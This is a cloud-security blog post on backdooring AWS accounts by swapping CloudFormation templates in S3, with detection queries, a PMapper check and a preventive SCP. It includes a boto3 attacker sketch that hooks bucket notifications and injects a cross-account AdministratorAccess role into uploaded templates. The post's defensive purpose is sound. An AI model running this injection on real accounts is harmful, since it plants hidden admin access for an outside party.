Sneaky Injections - CloudFormation

During one of our recent AWS Security Reviews, I ran across an interesting technique that attackers can use to create a backdoor in AWS accounts. It works by using three S3 IAM actions, CloudFormation, and an administrator who is not careful enough.

This vector is not new but still scary - and today, I will show you how to check your account for this risk and any previous compromises.

Intro

I became aware of this attack vector through RhinoSec’s blog post a while ago, but its significance only came back to me during an in-depth IAM check for a customer. As the original blog entry covers all requirements and even includes a demo video, I will only summarize the attack here and focus on how to detect and prevent it:

The core idea is pretty simple: if a user or role has permission to replace CloudFormation templates in the template bucket after upload but before deployment, they can inject something like a cross-account IAM role into the stack without detection.

This vector requires only three specific permissions on an exploitable role (a minimal sketch of how they chain together follows the list):

  • s3:PutBucketNotification to detect a new template upload
  • s3:GetObject to get the document
  • s3:PutObject to overwrite it with a modified version
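
To make this concrete, here is a minimal boto3 sketch of the attacker-side flow. It assumes a JSON template; the bucket name, queue ARN, and account IDs are placeholders, and the notification target is an attacker-controlled SQS queue (any notification destination would work):

# Hypothetical attacker-side sketch - all names, ARNs, and account IDs are placeholders
import json
import boto3

s3 = boto3.client("s3")  # uses the compromised role's credentials
bucket = "cf-templates-1abcdef2ghijk-eu-west-1"

# Step 1: s3:PutBucketNotification - get notified about every template upload
s3.put_bucket_notification_configuration(
    Bucket=bucket,
    NotificationConfiguration={
        "QueueConfigurations": [{
            "QueueArn": "arn:aws:sqs:eu-west-1:111122223333:attacker-queue",
            "Events": ["s3:ObjectCreated:*"],
        }]
    },
)

# Steps 2 and 3, run for each object key received via the queue
def inject_backdoor(key: str) -> None:
    # s3:GetObject - fetch the template the administrator just uploaded
    template = json.loads(s3.get_object(Bucket=bucket, Key=key)["Body"].read())
    # Insert a cross-account admin role before CloudFormation reads the file
    template.setdefault("Resources", {})["BackdoorRole"] = {
        "Type": "AWS::IAM::Role",
        "Properties": {
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [{
                    "Effect": "Allow",
                    "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
                    "Action": "sts:AssumeRole",
                }],
            },
            "ManagedPolicyArns": ["arn:aws:iam::aws:policy/AdministratorAccess"],
        },
    }
    # s3:PutObject - overwrite the original template with the modified version
    s3.put_object(Bucket=bucket, Key=key, Body=json.dumps(template).encode())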

If the exploited AWS account has neither S3 data event logging in CloudTrail nor S3 versioning enabled, chances are high that the compromise will go unnoticed for a while.
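
Versioning on the template buckets is a cheap safeguard here, as it preserves the original template for later comparison. A minimal sketch, assuming default credentials and a placeholder bucket name:

# Enable versioning so overwritten templates can be recovered and compared
import boto3

s3 = boto3.client("s3")
s3.put_bucket_versioning(
    Bucket="cf-templates-1abcdef2ghijk-eu-west-1",  # placeholder
    VersioningConfiguration={"Status": "Enabled"},
)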

Detecting Compromise

Luckily, it is easy to check whether your CloudFormation template buckets have notifications enabled, as AWS Config now supports Advanced Queries.

Assuming you have an organization-wide, multi-region Config Aggregator configured (now might be a good time to do this, if you have not already), you can use the following query:

-- Config Query: CloudFormation Template Buckets with Notifications
SELECT
  accountId,
  resourceId,
  awsRegion,
  supplementaryConfiguration.BucketNotificationConfiguration.configurations
WHERE
  resourceType = 'AWS::S3::Bucket'
  AND resourceId LIKE 'cf-templates-%'
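
If you prefer the SDK over the console, you can run the same expression against the aggregator programmatically. A sketch, assuming an aggregator named org-aggregator (adjust to your setup):

# Run the advanced query against a Config aggregator - the name is a placeholder
import boto3

config = boto3.client("config")
expression = """
SELECT accountId, resourceId, awsRegion,
  supplementaryConfiguration.BucketNotificationConfiguration.configurations
WHERE resourceType = 'AWS::S3::Bucket'
  AND resourceId LIKE 'cf-templates-%'
"""
response = config.select_aggregate_resource_config(
    Expression=expression,
    ConfigurationAggregatorName="org-aggregator",  # placeholder
)
for result in response["Results"]:
    print(result)  # each result is a JSON document for one matching bucket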

Usually, none of your template buckets should have a notification configuration. So if your output looks like the screenshot below, you might have an issue. In that case, check the details of the notification and verify the use case and the account ID it targets.

[Screenshot: Config Query Results]

It is worth noting that a savvy attacker might use this technique only once to deploy their backdoor and then remove the notification to evade detection.

For this case, you can use CloudTrail Lake and a SQL query to list all past PutBucketNotification actions:

-- CloudTrail Lake: S3 PutBucketNotification on CloudFormation Template Buckets
SELECT 
  eventTime,
  element_at(requestParameters, 'bucketName') as bucketName,
  awsRegion,
  userAgent,
  sourceIPAddress
FROM
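  -- replace with the ID of your own CloudTrail Lake event data store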
  d4c16b8b-6705-481b-b731-ee1d90e1edd1
WHERE
  eventName = 'PutBucketNotification'
  AND element_at(requestParameters, 'bucketName') LIKE 'cf-templates-%'
ORDER BY eventTime DESC  

Detecting Risky Privileges

As stated previously, the critical combination of privileges is s3:PutBucketNotification, s3:GetObject, and s3:PutObject on buckets whose names start with cf-templates-. Currently, there is no built-in AWS way to query who holds this combination - but there is a tool called PMapper, which I introduced in an earlier blog post.

If you have the tool installed, you can download all your IAM data (even multi-account) and run interactive queries. For our use case, the following commands show all roles and users with the critical privileges:

# Download IAM data and create a graph database
pmapper graph create

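# Query for principals that hold all three critical permissions on template buckets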
pmapper query "who can do s3:PutBucketNotification,s3:GetObject,s3:PutObject with cf-templates-*"

Preventing this Attack

As creating such notifications on CloudFormation template buckets is a very unusual pattern, I would recommend preventing it via IAM or even with a Service Control Policy:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PreventCfnBucketNotifications",
    "Effect": "Deny",
    "Action": "s3:PutBucketNotification",
    "Resource": "arn:aws:s3:::cf-templates-*"
  }]
}

Please check whether you have valid use cases for notifications like these before deploying this document as an organization-wide policy.
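
If you manage SCPs without an IaC tool, deployment could look like the following sketch. The policy name, file name, and root ID are placeholders, and the calls assume credentials in your organization’s management account:

# Create and attach the SCP - policy name, file, and root ID are placeholders
import boto3

org = boto3.client("organizations")
with open("prevent-cfn-bucket-notifications.json") as f:
    policy_document = f.read()

policy = org.create_policy(
    Name="PreventCfnBucketNotifications",
    Description="Deny s3:PutBucketNotification on CloudFormation template buckets",
    Type="SERVICE_CONTROL_POLICY",
    Content=policy_document,
)
org.attach_policy(
    PolicyId=policy["Policy"]["PolicySummary"]["Id"],
    TargetId="r-examplerootid",  # placeholder organization root ID
)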

Summary

This technique has been around for a while and is even part of popular penetration testing tools like PACU (see its cfn__resource_injection module).

With the recent introduction of SQL queries in AWS Config and CloudTrail Lake, detecting it has become much more accessible - and SCPs can even prevent it entirely.

As always, check your accounts and keep current on AWS news - the creativity of attackers is considerable, and there are probably plenty of variations to backdoor an AWS account if you are not careful enough.
